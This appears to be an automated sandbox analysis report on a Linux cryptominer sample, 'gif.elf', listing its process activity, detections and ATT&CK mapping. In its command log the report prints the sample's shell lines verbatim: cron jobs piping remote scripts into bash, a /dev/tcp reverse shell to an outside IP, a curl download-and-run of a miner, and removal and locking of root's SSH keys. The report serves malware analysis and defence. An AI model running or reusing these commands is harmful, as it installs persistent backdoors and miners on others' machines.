        Source: /usr/bin/killall (PID: 5581)File opened: /proc/236/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/116/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/237/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/117/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/238/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/118/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/239/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/119/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/914/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/10/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/917/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/11/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/12/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/13/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/14/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/15/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/16/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/17/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/18/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/19/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/240/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/3095/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/120/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/241/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/121/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/242/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/1/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/122/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/243/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/2/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/123/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/244/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/3/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/124/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/245/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/1588/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/125/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/4/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/246/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/126/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/5/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/247/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/127/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/6/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/248/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/128/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/7/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/249/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/129/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/8/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/800/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/9/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/1906/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/802/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/803/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/3645/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/20/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/21/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/22/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/23/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/24/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/25/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/26/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/27/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/28/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/29/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/3420/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/1482/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/490/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/1480/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/250/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/371/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/130/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/251/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/131/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/252/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/132/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/253/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/254/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/1238/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/134/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/255/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/256/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/257/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/378/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/3413/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/258/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/259/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/1475/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/936/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/3656/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/30/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/816/statJump to behavior
        Source: /tmp/gif.elf (PID: 5485)Shell command executed: sh -c "chattr -ia -R /root/.ssh"Jump to behavior
        Source: /tmp/gif.elf (PID: 5487)Shell command executed: sh -c "rm -rf /root/.ssh/authorized_keys2"Jump to behavior
        Source: /tmp/gif.elf (PID: 5489)Shell command executed: sh -c "chattr +i /root/.ssh/authorized_keys2"Jump to behavior
        Source: /tmp/gif.elf (PID: 5491)Shell command executed: sh -c "chattr -ia -R /etc/cron.d > /dev/null 2>&1"Jump to behavior
        Source: /tmp/gif.elf (PID: 5493)Shell command executed: sh -c "chattr -ia /etc/crontab > /dev/null 2>&1"Jump to behavior
        Source: /tmp/gif.elf (PID: 5495)Shell command executed: sh -c "chattr -ia -R /var/spool/cron > /dev/null 2>&1"Jump to behavior
        Source: /tmp/gif.elf (PID: 5497)Shell command executed: sh -c "chattr -ia -R /var/spool/cron/crontabs > /dev/null 2>&1"Jump to behavior
        Source: /tmp/gif.elf (PID: 5499)Shell command executed: sh -c "chattr -ia -R /etc/cron.hourly > /dev/null 2>&1"Jump to behavior
        Source: /tmp/gif.elf (PID: 5501)Shell command executed: sh -c "echo '0 1 * * * root curl -fs http://z.shavsl.com/b|bash ' > /etc/cron.d/watch"Jump to behavior
        Source: /tmp/gif.elf (PID: 5502)Shell command executed: sh -c "echo '0 2 * * * root wget -c http://z.shavsl.com/b -qO -|bash ' >> /etc/cron.d/watch"Jump to behavior
        Source: /tmp/gif.elf (PID: 5503)Shell command executed: sh -c "chattr +i /etc/cron.d/watch > /dev/null 2>&1"Jump to behavior
        Source: /tmp/gif.elf (PID: 5505)Shell command executed: sh -c "echo '#!/bin/bash' > /etc/cron.hourly/prelink"Jump to behavior
        Source: /tmp/gif.elf (PID: 5506)Shell command executed: sh -c "echo 'bash -i >& /dev/tcp/45.125.66.31/8443 0>&1' >> /etc/cron.hourly/prelink"Jump to behavior
        Source: /tmp/gif.elf (PID: 5507)Shell command executed: sh -c "chmod 755 /etc/cron.hourly/prelink"Jump to behavior
        Source: /tmp/gif.elf (PID: 5509)Shell command executed: sh -c "chattr +i /etc/cron.hourly/prelink > /dev/null 2>&1"Jump to behavior
        Source: /tmp/gif.elf (PID: 5511)Shell command executed: sh -c "chattr -ia -R /root/.ssh"Jump to behavior
        Source: /tmp/gif.elf (PID: 5513)Shell command executed: sh -c "rm -rf /root/.ssh/authorized_keys"Jump to behavior
        Source: /tmp/gif.elf (PID: 5515)Shell command executed: sh -c "chattr +i /root/.ssh/authorized_keys"Jump to behavior
        Source: /tmp/gif.elf (PID: 5517)Shell command executed: sh -c "chattr -ia -R /root/.ssh"Jump to behavior
        Source: /tmp/gif.elf (PID: 5519)Shell command executed: sh -c "rm -rf /root/.ssh/authorized_keys2"Jump to behavior
        Source: /tmp/gif.elf (PID: 5521)Shell command executed: sh -c "chattr +i /root/.ssh/authorized_keys2"Jump to behavior
        Source: /tmp/gif.elf (PID: 5523)Shell command executed: sh -c "curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner && chmod 755 /tmp/.miner && /tmp/.miner"Jump to behavior
        Source: /tmp/.miner (PID: 5532)Shell command executed: sh -c "rm -f /etc/hosts.old"Jump to behavior
        Source: /tmp/.miner (PID: 5535)Shell command executed: sh -c "mount --bind /proc/1 /proc/5534"Jump to behavior
        Source: /tmp/gif.elf (PID: 5536)Shell command executed: sh -c "chattr -ia /tmp/python > /dev/null 2>&1 && rm -rf /tmp/python > /dev/null 2>&1"Jump to behavior
        Source: /tmp/gif.elf (PID: 5564)Shell command executed: sh -c "chattr -ia chattr -ia /usr/bin/bsd-port/getty > /dev/null 2>&1 && rm -rf /usr/bin/bsd-port/getty > /dev/null 2>&1"Jump to behavior
        Source: /tmp/gif.elf (PID: 5566)Shell command executed: sh -c "chattr -ia /usr/bin/.sshd > /dev/null 2>&1 && rm -rf /usr/bin/.sshd > /dev/null 2>&1"Jump to behavior
        Source: /tmp/gif.elf (PID: 5568)Shell command executed: sh -c "chattr -ia /etc/rc.d/init.d/selinux > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/selinux > /dev/null 2>&1"Jump to behavior
        Source: /tmp/gif.elf (PID: 5570)Shell command executed: sh -c "chattr -ia /etc/rc.d/init.d/DbSecuritySp > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/DbSecuritySpt > /dev/null 2>&1"Jump to behavior
        Source: /tmp/gif.elf (PID: 5572)Shell command executed: sh -c "chattr -ia /usr/bin/sh.sh > /dev/null 2>&1 && rm -rf /usr/bin/sh.sh > /dev/null 2>&1"Jump to behavior
        Source: /tmp/gif.elf (PID: 5574)Shell command executed: sh -c "chattr -ia /etc/cron.hourly/cron.sh > /dev/null 2>&1 && rm -rf /etc/cron.hourly/cron.sh > /dev/null 2>&1"Jump to behavior
        Source: /tmp/gif.elf (PID: 5576)Shell command executed: sh -c "chattr -ia /lib/udev/udev /lib/udev/debug > /dev/null 2>&1 && rm -rf /lib/udev/udev /lib/udev/debug > /dev/null 2>&1"Jump to behavior
        Source: /tmp/gif.elf (PID: 5578)Shell command executed: sh -c "chattr -ia /usr/bin/xrig > /dev/null 2>&1 && rm -rf /usr/bin/xrig 1> /dev/null 2>&1"Jump to behavior
        Source: /tmp/gif.elf (PID: 5580)Shell command executed: sh -c "killall .sshd xrig getty > /dev/null 2>&1 "Jump to behavior
        Source: /bin/sh (PID: 5508)Chmod executable: /usr/bin/chmod -> chmod 755 /etc/cron.hourly/prelinkJump to behavior
        Source: /bin/sh (PID: 5530)Chmod executable: /usr/bin/chmod -> chmod 755 /tmp/.minerJump to behavior
        Source: /bin/sh (PID: 5524)Curl executable: /usr/bin/curl -> curl -fs http://w.softprojectcode.com/miner -o /tmp/.minerJump to behavior
        Source: /bin/sh (PID: 5488)Rm executable: /usr/bin/rm -> rm -rf /root/.ssh/authorized_keys2Jump to behavior
        Source: /bin/sh (PID: 5514)Rm executable: /usr/bin/rm -> rm -rf /root/.ssh/authorized_keysJump to behavior
        Source: /bin/sh (PID: 5520)Rm executable: /usr/bin/rm -> rm -rf /root/.ssh/authorized_keys2Jump to behavior
        Source: /bin/sh (PID: 5533)Rm executable: /usr/bin/rm -> rm -f /etc/hosts.oldJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads from proc file: /proc/cpuinfoJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads from proc file: /proc/meminfoJump to behavior
        Source: /tmp/.miner (PID: 5534)Reads from proc file: /proc/meminfoJump to behavior
        Source: /usr/bin/chmod (PID: 5508)File: /etc/cron.hourly/prelink (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 5530)File: /tmp/.miner (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/curl (PID: 5524)File written: /tmp/.minerJump to dropped file
        Source: /bin/sh (PID: 5501)Crontab like entry written: /etc/cron.d/watch
        Source: /bin/sh (PID: 5502)Crontab like entry written: /etc/cron.d/watchJump to dropped file
        Source: /bin/sh (PID: 5505)Writes shell script file to disk with an unusual file extension: /etc/cron.hourly/prelink
        Source: /tmp/.miner (PID: 5534)Log file created: /run/mountinfo.logJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: /usr/bin/curl (PID: 5524)ELF file: /tmp/.minerJump to dropped file
        Source: .miner.94.drDropped file: segment LOAD with 7.9999 entropy (max. 8.0)
        Source: /tmp/.miner (PID: 5531)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_cpusJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/die_cpusJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/package_cpusJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_mapJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/levelJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/typeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_setsJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partitionJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_mapJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/levelJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/typeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_mapJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/levelJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/typeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_setsJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partitionJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_mapJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/levelJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/typeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_setsJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partitionJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_cpusJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/die_cpusJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/package_cpusJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/physical_package_idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/shared_cpu_mapJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/levelJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/typeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/coherency_line_sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/number_of_setsJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/physical_line_partitionJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/shared_cpu_mapJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/levelJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/typeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_mapJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/levelJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/typeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/coherency_line_sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/number_of_setsJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/physical_line_partitionJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/shared_cpu_mapJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/levelJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/typeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/coherency_line_sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/number_of_setsJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/physical_line_partitionJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/possibleJump to behavior
        Source: /usr/bin/curl (PID: 5524)Queries kernel information via 'uname': Jump to behavior
        Source: /tmp/.miner (PID: 5531)Queries kernel information via 'uname': Jump to behavior
        Source: .miner, 5531.1.00007fb819164000.00007fb819168000.rwx.sdmpBinary or memory string: VMware Virtual Platform
        Source: .miner, 5531.1.00007fb819164000.00007fb819168000.rwx.sdmpBinary or memory string: VMware, Inc.
        Source: mountinfo.log.103.drBinary or memory string: * MOTHERBOARD VMware, Inc. - VMware Virtual Platform

        Anti Debugging

        barindex
        Source: /tmp/.miner (PID: 5535)Process with PPID: /bin/sh -> sh -c "mount --bind /proc/1 /proc/5534"Jump to behavior
        Source: /bin/sh (PID: 5486)Args: chattr -ia -R /root/.sshJump to behavior
        Source: /bin/sh (PID: 5492)Args: chattr -ia -R /etc/cron.dJump to behavior
        Source: /bin/sh (PID: 5494)Args: chattr -ia /etc/crontabJump to behavior
        Source: /bin/sh (PID: 5496)Args: chattr -ia -R /var/spool/cronJump to behavior
        Source: /bin/sh (PID: 5498)Args: chattr -ia -R /var/spool/cron/crontabsJump to behavior
        Source: /bin/sh (PID: 5500)Args: chattr -ia -R /etc/cron.hourlyJump to behavior
        Source: /bin/sh (PID: 5512)Args: chattr -ia -R /root/.sshJump to behavior
        Source: /bin/sh (PID: 5518)Args: chattr -ia -R /root/.sshJump to behavior
        Source: /bin/sh (PID: 5538)Args: chattr -ia /tmp/pythonJump to behavior
        Source: /bin/sh (PID: 5565)Args: chattr -ia chattr -ia /usr/bin/bsd-port/gettyJump to behavior
        Source: /bin/sh (PID: 5567)Args: chattr -ia /usr/bin/.sshdJump to behavior
        Source: /bin/sh (PID: 5569)Args: chattr -ia /etc/rc.d/init.d/selinuxJump to behavior
        Source: /bin/sh (PID: 5571)Args: chattr -ia /etc/rc.d/init.d/DbSecuritySpJump to behavior
        Source: /bin/sh (PID: 5573)Args: chattr -ia /usr/bin/sh.shJump to behavior
        Source: /bin/sh (PID: 5575)Args: chattr -ia /etc/cron.hourly/cron.shJump to behavior
        Source: /bin/sh (PID: 5577)Args: chattr -ia /lib/udev/udev /lib/udev/debugJump to behavior
        Source: /bin/sh (PID: 5579)Args: chattr -ia /usr/bin/xrigJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information2
        Scripting
        Valid Accounts1
        Scheduled Task/Job
        1
        Scheduled Task/Job
        1
        Scheduled Task/Job
        1
        Masquerading
        1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote ServicesData from Local System1
        Non-Standard Port
        1
        Exfiltration Over Alternative Protocol
        1
        Data Manipulation
        CredentialsDomainsDefault AccountsScheduled Task/Job2
        Scripting
        Boot or Logon Initialization Scripts13
        File and Directory Permissions Modification
        LSASS Memory11
        File and Directory Discovery
        Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
        Hidden Files and Directories
        Security Account Manager3
        System Information Discovery
        SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Obfuscated Files or Information
        NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        File Deletion
        LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1633205 Sample: gif.elf Startdate: 10/03/2025 Architecture: LINUX Score: 100 69 o4.softgoldinformation.com 176.32.39.18, 3334, 55876, 55878 ASBAXETRU Russian Federation 2->69 71 o.softgoldinformation.com 2->71 73 2 other IPs or domains 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 Antivirus detection for dropped file 2->77 79 Multi AV Scanner detection for submitted file 2->79 81 Yara detected Xmrig cryptocurrency miner 2->81 13 gif.elf 2->13         started        signatures3 83 Detected Stratum mining protocol 69->83 process4 process5 15 gif.elf 13->15         started        process6 17 gif.elf 15->17         started        file7 59 /root/.ssh/authorized_keys2, OpenSSH 17->59 dropped 61 /root/.ssh/authorized_keys, OpenSSH 17->61 dropped 20 gif.elf sh 17->20         started        22 gif.elf sh 17->22         started        24 gif.elf sh 17->24         started        28 29 other processes 17->28 process8 file9 30 sh .miner 20->30         started        33 sh curl 20->33         started        36 sh chmod 20->36         started        38 sh chmod 22->38         started        65 /etc/cron.d/watch, ASCII 24->65 dropped 87 Sample tries to persist itself using cron 24->87 67 /etc/cron.hourly/prelink, ASCII 28->67 dropped 40 sh chattr 28->40         started        42 sh chattr 28->42         started        44 sh chattr 28->44         started        46 23 other processes 28->46 signatures10 process11 file12 89 Found strings related to Crypto-Mining 30->89 91 Sample reads /proc/mounts (often used for finding a writable filesystem) 30->91 48 .miner 30->48         started        50 .miner sh 30->50         started        63 /tmp/.miner, ELF 33->63 dropped 93 Drops invisible ELF files 33->93 95 Sample tries to set files in /etc globally writable 38->95 97 Protects files from modification 40->97 99 Terminates several processes with shell command 'killall' 46->99 signatures13 process14 process15 52 .miner sh 48->52         started        55 sh rm 50->55         started        signatures16 85 Executes itself again with its parent PID as an argument (indicative of hampering debugging) 52->85 57 sh mount 52->57         started        process17

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        gif.elf10%VirustotalBrowse
        gif.elf8%ReversingLabsLinux.Coinminer.Generic
        SourceDetectionScannerLabelLink
        /tmp/.miner100%AviraLINUX/BitCoinMiner.jrext
